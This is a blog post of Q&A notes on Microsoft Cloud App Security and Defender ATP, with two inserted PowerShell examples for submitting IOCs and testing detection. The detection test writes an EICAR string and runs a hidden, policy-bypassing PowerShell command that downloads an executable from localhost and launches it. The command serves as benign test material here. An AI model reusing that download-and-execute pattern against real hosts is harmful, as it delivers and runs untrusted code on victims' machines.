SharePoint Stuff

Microsoft Cloud App Security (MCAS) Q&A

Written by Luke Smith. Posted in Microsoft

Q: How quickly can the MCAS log collector ingest data?
A: 50GB\hr; the main limitations are bandwidth and processing, which can be overcome by increasing the compute\bandwidth or adding more collectors
Q: What happens if the MCAS log collector can't process the data quickly enough?
A: Data is dropped (DD to confirm); adding more collectors is recommended
Q: Do you need an MCAS log collector per device?
A: No, you can use the same one
Q: Can I add more MCAS log collectors?
A: Yes (DD to confirm if they can be load balanced; I think they can but couldn't find an article)
Q: What do I need to do to protect my end users when using the MCAS proxy?
A: Devices need to be Azure AD joined, as it uses conditional access
Q: Does the MCAS proxy work with non-Windows 10 devices?
A: Yes, using conditional access from MDM for macOS, Android and iOS – Windows 8.1 or below TBC
Q: If the details of a cloud vendor are incorrect, how can these be updated?
A: Microsoft support request from the portal
Q: Do you need to license every user for MCAS to view the activity?
A: Not for proxy\firewall logs
Q: Do you need to license every user for MCAS if you need to control access using the proxy?
A: Yes
Q: Can we create our own application and vendor classification?
A: TBC
Q: Can we integrate MCAS with a SIEM?
A: Yes
Q: Can we integrate MCAS and ATP (Defender and Office 365) together?
A: TBC
Q: Can we integrate AIP with MCAS?
A: Yes

Useful Links:
Docs.Microsoft: https://docs.microsoft.com/en-us/cloud-app-security/what-is-cloud-app-security

Windows Defender Advanced Threat Protection (WDATP) Q&A

Written by Luke Smith. Posted in Microsoft

Q: Can you configure Defender ATP to use additional or different security threat feeds such as FireEye, LookingGlass, Infoblox, SecureWorks, RSA, McAfee or a customer-prebuilt feed?
A: TBC
Q: Are you able to block particular MD5 hashes\applications?
A: You can create custom IOCs and TIs using the API or PowerShell (https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-atp/threat-indicator-concepts-windows-defender-advanced-threat-protection)
Q: Can you define automatic custom isolation and block rules (based on MD5 and application names)?
A: TBC
Q: Can you change the ratings of the existing threat categories?
A: Only for the custom Indicators of Compromise (IOCs) or Threat Intelligence (TIs)
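The two answers above say custom IOCs can be pushed to Defender ATP through its API or PowerShell. The following PowerShell is an added example (not from the original post) showing the shape of that workflow: obtain an app-only token, submit a file-hash indicator with an alert-and-block action, and read it back. It assumes an Azure AD app registration granted the indicators (Ti.ReadWrite) permission, uses placeholder tenant/app values and a constructed hash, and assumes the API host, path and field names of the Defender ATP indicators API as documented; check them against the current Microsoft docs before use. SHA-256 is used rather than the MD5 asked about in the post, since file indicators are keyed on SHA-1/SHA-256 values.

```powershell
# Added example: submit a custom file-hash indicator to the Defender ATP indicators API.
# Placeholders below must be replaced with real tenant/app values (constructed, not real).
$TenantId     = '<tenant-id>'
$ClientId     = '<app-id>'
$ClientSecret = '<app-secret>'
$ApiHost      = 'https://api.securitycenter.windows.com'   # assumed API host

# 1. App-only token via the client-credentials flow (assumed token endpoint/resource).
$tokenResp = Invoke-RestMethod -Method Post `
    -Uri "https://login.microsoftonline.com/$TenantId/oauth2/token" `
    -Body @{ grant_type    = 'client_credentials'
             client_id     = $ClientId
             client_secret = $ClientSecret
             resource      = $ApiHost }
$headers = @{ Authorization = "Bearer $($tokenResp.access_token)" }

# 2. Indicator payload. The hash is a constructed placeholder, not a real sample.
$indicator = @{
    indicatorValue = ('a' * 64)            # placeholder SHA-256 (64 hex chars)
    indicatorType  = 'FileSha256'
    action         = 'AlertAndBlock'       # alert in the portal and block execution
    title          = 'Blocked test binary'
    description    = 'Custom IOC submitted from PowerShell'
    severity       = 'High'
    expirationTime = (Get-Date).AddDays(30).ToUniversalTime().ToString('o')
}

$result = Invoke-RestMethod -Method Post -Uri "$ApiHost/api/indicators" -Headers $headers `
    -ContentType 'application/json' -Body ($indicator | ConvertTo-Json)
$result | Select-Object id, indicatorValue, action, expirationTime

# 3. Read the indicator list back and confirm the new entry is present.
(Invoke-RestMethod -Uri "$ApiHost/api/indicators" -Headers $headers).value |
    Where-Object { $_.indicatorValue -eq $indicator.indicatorValue } |
    Select-Object id, indicatorType, action, createdBy
```

The expiration time is the main thing to get right operationally: an indicator without one blocks forever, so set a review date and treat the list as something that is audited, not append-only.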
Q: Can you integrate with other SIEMs\SOCs?
A: Currently only HP and Splunk
Q: Can Defender ATP integrate with third-party CMDBs?
A: AD using AD Connect – TBC for third parties such as SCCM\LANDesk
Q: Can Windows Defender ATP integrate with Office ATP?
A: Yes, WDATP and O365 ATP can be integrated; it needs enabling as per the following: https://support.office.com/en-us/article/Office-365-Threat-Intelligence-overview-32405DA5-BEE1-4A4B-82E5-8399DF94C512 and https://docs.microsoft.com/en-gb/windows/threat-protection/windows-defender-atp/advanced-features-windows-defender-advanced-threat-protection
Q: Can Defender ATP work with older versions of Windows below 8.1?
A: No, but it does work with Windows Server 2012 R2 and above: https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-atp/configure-server-endpoints-windows-defender-advanced-threat-protection
Q: Can Defender ATP work with non-Windows based machines?
A: Yes, requires Bitdefender and can run on macOS, Linux, iOS and Android: https://www.bitdefender.com/business/end-point-security-linux-mac.html (other third parties such as Lookout and Ziften will be added Nov 2017)
Q: Can Defender integrate with Cloud App Security?
A: TBC
Q: How can I test Defender ATP?
A: See: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Virus:DOS/EICAR_Test_File – text file containing remove the <>
A: Once configured, also run:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-WDATP-test\invoice.exe');Start-Process 'C:\test-WDATP-test\invoice.exe'
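The two-step test above (drop the EICAR test file, then run the onboarding command) is usually done by hand. The following PowerShell is an added example, not part of the original post, that wraps both steps into one script and checks the local Defender engine for the resulting detection, so the test is repeatable across a pilot group. It assumes an elevated session on a Windows 10 host with the Defender PowerShell module (Get-MpThreatDetection), and the test directory path is the one used in the post's command.

```powershell
# Added example: run the EICAR and WDATP onboarding tests and confirm local detection.
$TestDir = 'C:\test-WDATP-test'
New-Item -ItemType Directory -Path $TestDir -Force | Out-Null

# 1. EICAR anti-malware test file. The well-known test string is assembled from two
#    halves so that this script file itself is not quarantined before it can run.
$eicarHead = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$'
$eicarTail = 'EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
$eicarPath = Join-Path $TestDir 'eicar.com'
try {
    [System.IO.File]::WriteAllText($eicarPath, $eicarHead + $eicarTail, [System.Text.Encoding]::ASCII)
} catch {
    # Real-time protection may block the write itself; that is also a successful detection.
    Write-Host "Write blocked by real-time protection: $($_.Exception.Message)"
}
Start-Sleep -Seconds 10

# 2. Ask the local Defender engine whether it recorded a detection for the test file.
$hits = Get-MpThreatDetection | Where-Object { $_.Resources -match 'eicar' }
if ($hits) {
    Write-Host "EICAR detected: $(@($hits).Count) detection record(s); file present: $(Test-Path $eicarPath)"
} else {
    Write-Host 'No EICAR detection recorded: check that real-time protection is enabled'
}

# 3. The WDATP onboarding test from the post (same command, passed as an argument list).
#    127.0.0.1 serves nothing, so the download fails; the behaviour itself is what should
#    raise an alert in the Defender ATP portal within a few minutes.
$cmd = "(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', '$TestDir\invoice.exe');Start-Process '$TestDir\invoice.exe'"
Start-Process -FilePath 'powershell.exe' -ArgumentList @(
    '-NoExit', '-ExecutionPolicy', 'Bypass', '-WindowStyle', 'Hidden', '-Command', $cmd
)
Write-Host "Onboarding test launched; check the Defender ATP portal for an alert on $env:COMPUTERNAME"
```

The local check in step 2 only proves the Defender engine on the box is working; the portal alert from step 3 is what proves the machine is onboarded and reporting, so both results should be recorded per host.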

Useful Links:
Docs.Microsoft: https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-atp/windows-defender-advanced-threat-protection
Windows Defender Advanced Threat Protection – Ransomware response playbook https://www.microsoft.com/en-us/download/confirmation.aspx?id=55090